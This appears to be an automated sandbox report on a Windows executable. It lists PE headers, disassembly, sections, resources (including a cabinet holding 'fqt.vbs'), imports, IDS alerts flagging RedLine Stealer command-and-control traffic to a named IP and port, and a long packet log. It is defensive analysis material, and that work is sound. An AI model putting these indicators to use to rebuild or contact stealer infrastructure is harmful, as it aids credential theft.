                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:10
                                                                    OS Version Minor:0
                                                                    File Version Major:10
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:10
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
                                                                    Instruction
                                                                    dec eax
                                                                    sub esp, 28h
                                                                    call 00007FBD0926E4B0h
                                                                    dec eax
                                                                    add esp, 28h
                                                                    jmp 00007FBD0926DD5Bh
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    dec eax
                                                                    mov dword ptr [esp+08h], ebx
                                                                    dec eax
                                                                    mov dword ptr [esp+10h], edi
                                                                    inc ecx
                                                                    push esi
                                                                    dec eax
                                                                    sub esp, 000000B0h
                                                                    and dword ptr [esp+20h], 00000000h
                                                                    dec eax
                                                                    lea ecx, dword ptr [esp+40h]
                                                                    call dword ptr [000011CDh]
                                                                    nop
                                                                    dec eax
                                                                    mov eax, dword ptr [00000030h]
                                                                    dec eax
                                                                    mov ebx, dword ptr [eax+08h]
                                                                    xor edi, edi
                                                                    xor eax, eax
                                                                    dec eax
                                                                    cmpxchg dword ptr [00004922h], ebx
                                                                    je 00007FBD0926DD5Ch
                                                                    dec eax
                                                                    cmp eax, ebx
                                                                    jne 00007FBD0926DD6Ch
                                                                    mov edi, 00000001h
                                                                    mov eax, dword ptr [00004918h]
                                                                    cmp eax, 01h
                                                                    jne 00007FBD0926DD69h
                                                                    lea ecx, dword ptr [eax+1Eh]
                                                                    call 00007FBD0926E343h
                                                                    jmp 00007FBD0926DDCCh
                                                                    mov ecx, 000003E8h
                                                                    call dword ptr [0000117Eh]
                                                                    jmp 00007FBD0926DD19h
                                                                    mov eax, dword ptr [000048F6h]
                                                                    test eax, eax
                                                                    jne 00007FBD0926DDABh
                                                                    mov dword ptr [000048E8h], 00000001h
                                                                    dec esp
                                                                    lea esi, dword ptr [000013E9h]
                                                                    dec eax
                                                                    lea ebx, dword ptr [000013CAh]
                                                                    dec eax
                                                                    mov dword ptr [esp+30h], ebx
                                                                    mov dword ptr [esp+24h], eax
                                                                    dec ecx
                                                                    cmp ebx, esi
                                                                    jnc 00007FBD0926DD77h
                                                                    test eax, eax
                                                                    jne 00007FBD0926DD77h
                                                                    dec eax
                                                                    cmp dword ptr [ebx], 00000000h
                                                                    je 00007FBD0926DD62h
                                                                    dec eax
                                                                    mov eax, dword ptr [ebx]
                                                                    dec eax
                                                                    mov ecx, dword ptr [00001388h]
                                                                     Name | Virtual Address | Virtual Size | Is in Section
                                                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa23c | 0xb4 | .rdata
                                                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1d530 | .rsrc
                                                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x408 | .pdata
                                                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2d000 | 0x20 | .reloc
                                                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a10 | 0x54 | .rdata
                                                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x118 | .rdata
                                                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_IAT | 0x9128 | 0x520 | .rdata
                                                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                     .text | 0x1000 | 0x7b80 | 0x7c00 | 60800deac1fde21b98089f2241ee6168 | False | 0.5499936995967742 | data | 6.096261782871538 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                     .rdata | 0x9000 | 0x22c8 | 0x2400 | 59d15cdf89780817c3d48dd588a6a129 | False | 0.4136284722222222 | data | 4.727841929207054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                     .data | 0xc000 | 0x1f00 | 0x400 | 9d1580dccaf8e787a43caf4bba48a079 | False | 0.3212890625 | data | 3.1889769845125677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                     .pdata | 0xe000 | 0x408 | 0x600 | 15cd12257317071f28e4f7b728f8825e | False | 0.3932291666666667 | data | 3.1563665040475675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                     .rsrc | 0xf000 | 0x1e000 | 0x1d600 | bd56424859de998f0d17ce8c06b61aac | False | 0.7439744015957447 | data | 7.068583798611468 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                     .reloc | 0x2d000 | 0x20 | 0x200 | 637787151ee546a94902de9694a58fd6 | False | 0.083984375 | data | 0.4068473715812382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                     Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                     AVI | 0xf9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
                                                                     RT_ICON | 0x12814 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
                                                                     RT_ICON | 0x12e7c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
                                                                     RT_ICON | 0x13164 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
                                                                     RT_ICON | 0x1334c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
                                                                     RT_ICON | 0x13474 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
                                                                     RT_ICON | 0x1431c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
                                                                     RT_ICON | 0x14bc4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
                                                                     RT_ICON | 0x1528c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
                                                                     RT_ICON | 0x157f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
                                                                     RT_ICON | 0x231c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
                                                                     RT_ICON | 0x25770 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
                                                                     RT_ICON | 0x26818 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
                                                                     RT_ICON | 0x271a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
                                                                     RT_DIALOG | 0x27608 | 0x2f2 | data | English | United States | 0.4389920424403183
                                                                     RT_DIALOG | 0x278fc | 0x1b0 | data | English | United States | 0.5625
                                                                     RT_DIALOG | 0x27aac | 0x166 | data | English | United States | 0.5223463687150838
                                                                     RT_DIALOG | 0x27c14 | 0x1c0 | data | English | United States | 0.5446428571428571
                                                                     RT_DIALOG | 0x27dd4 | 0x130 | data | English | United States | 0.5526315789473685
                                                                     RT_DIALOG | 0x27f04 | 0x120 | data | English | United States | 0.5763888888888888
                                                                     RT_STRING | 0x28024 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714
                                                                     RT_STRING | 0x280b0 | 0x520 | data | English | United States | 0.4032012195121951
                                                                     RT_STRING | 0x285d0 | 0x5cc | data | English | United States | 0.36455525606469
                                                                     RT_STRING | 0x28b9c | 0x4b0 | data | English | United States | 0.385
                                                                     RT_STRING | 0x2904c | 0x44a | data | English | United States | 0.3970856102003643
                                                                     RT_STRING | 0x29498 | 0x3ce | data | English | United States | 0.36858316221765913
                                                                     RT_RCDATA | 0x29868 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                                     RT_RCDATA | 0x29870 | 0x1f8e | Microsoft Cabinet archive data, Windows 2000/XP setup, 8078 bytes, 1 file, at 0x2c +A "fqt.vbs", ID 708, number 1, 1 datablock, 0x1503 compression | English | United States | 1.0013617231988117
                                                                     RT_RCDATA | 0x2b800 | 0x4 | data | English | United States | 3.0
                                                                     RT_RCDATA | 0x2b804 | 0x24 | Matlab v4 mat-file (little endian) , rows 18, columns 18, imaginary | English | United States | 0.7777777777777778
                                                                     RT_RCDATA | 0x2b828 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                                     RT_RCDATA | 0x2b830 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                                     RT_RCDATA | 0x2b838 | 0x4 | data | English | United States | 3.0
                                                                     RT_RCDATA | 0x2b83c | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                                     RT_RCDATA | 0x2b844 | 0x4 | data | English | United States | 3.0
                                                                     RT_RCDATA | 0x2b848 | 0x13 | ASCII text, with no line terminators | English | United States | 1.4210526315789473
                                                                     RT_RCDATA | 0x2b85c | 0x4 | data | English | United States | 3.0
                                                                     RT_RCDATA | 0x2b860 | 0x13 | ASCII text, with no line terminators | English | United States | 1.4210526315789473
                                                                     RT_RCDATA | 0x2b874 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                                     RT_RCDATA | 0x2b87c | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
                                                                     RT_GROUP_ICON | 0x2b884 | 0xbc | data | English | United States | 0.6117021276595744
                                                                     RT_VERSION | 0x2b940 | 0x408 | data | English | United States | 0.42151162790697677
                                                                     RT_MANIFEST | 0x2bd48 | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll | GetDeviceCaps
USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-26T12:16:25.187281+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 185.199.109.133 | 443 | 192.168.2.4 | 49730 | TCP
2024-09-26T12:16:33.921234+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.4 | 49739 | 185.196.9.26 | 6302 | TCP
2024-09-26T12:16:33.921234+0200 | 2046045 | ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) | 1 | 192.168.2.4 | 49739 | 185.196.9.26 | 6302 | TCP
2024-09-26T12:16:34.112551+0200 | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 1 | 185.196.9.26 | 6302 | 192.168.2.4 | 49739 | TCP
2024-09-26T12:16:39.174086+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.4 | 49739 | 185.196.9.26 | 6302 | TCP
2024-09-26T12:16:41.155211+0200 | 2046056 | ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) | 1 | 185.196.9.26 | 6302 | 192.168.2.4 | 49739 | TCP
2024-09-26T12:16:41.485595+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.4 | 49739 | 185.196.9.26 | 6302 | TCP
2024-09-26T12:16:41.769349+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.4 | 49739 | 185.196.9.26 | 6302 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 12:16:22.355675936 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:22.355751038 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:22.355829954 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:22.485929012 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:22.485990047 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:22.965425968 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:22.965495110 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:22.971198082 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:22.971221924 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:22.971545935 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.021785021 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.023564100 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.067409039 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.191518068 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.191966057 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.191992044 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.192001104 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.192017078 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.192045927 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.192051888 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.192058086 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.192089081 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.199568987 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.199626923 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.199657917 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.199670076 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.199681044 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.199690104 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.199719906 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.207370043 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.207417965 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.207442045 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.256182909 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.282805920 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.282870054 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.282900095 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.282913923 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.282941103 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.282978058 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.282984018 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.283473969 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.283524036 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.283533096 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.283576965 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.283612013 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.283617973 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.283646107 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.283679008 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.283684015 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.284356117 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.284401894 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.284410954 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.290534973 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.290571928 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.290590048 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.290610075 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.290647984 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.290934086 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.290991068 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.291022062 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.291028976 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.291035891 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.291068077 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.291073084 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.291791916 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.291822910 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.291829109 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.291837931 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.291863918 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.374150038 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.374164104 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.374197006 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.374237061 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.374264956 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.374301910 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.374322891 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.375965118 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.375987053 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.376051903 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.376069069 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.376106024 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.381602049 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.381625891 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.381696939 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.381717920 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.381758928 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.429003000 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.429029942 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.429109097 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.429125071 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.429188013 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.464972019 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.464998960 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.465075016 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.465090036 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.465127945 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.465790987 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.465811968 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.465886116 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.465897083 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.465930939 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.472770929 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.472795963 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.472862959 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.472896099 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.472954988 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.473436117 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.473452091 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.473489046 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.473503113 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.473525047 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.473542929 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.474410057 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.474431038 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.474478960 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.474484921 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.474518061 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.474534988 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.519661903 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.519689083 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.519764900 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.519792080 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.519830942 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.555423021 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.555449009 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.555504084 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.555531979 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.555553913 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.555572033 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.555907011 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.555926085 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.555980921 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.555990934 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
Sep 26, 2024 12:16:23.556026936 CEST | 49730 | 443   | 192.168.2.4     | 185.199.109.133
Sep 26, 2024 12:16:23.556715012 CEST | 443   | 49730 | 185.199.109.133 | 192.168.2.4
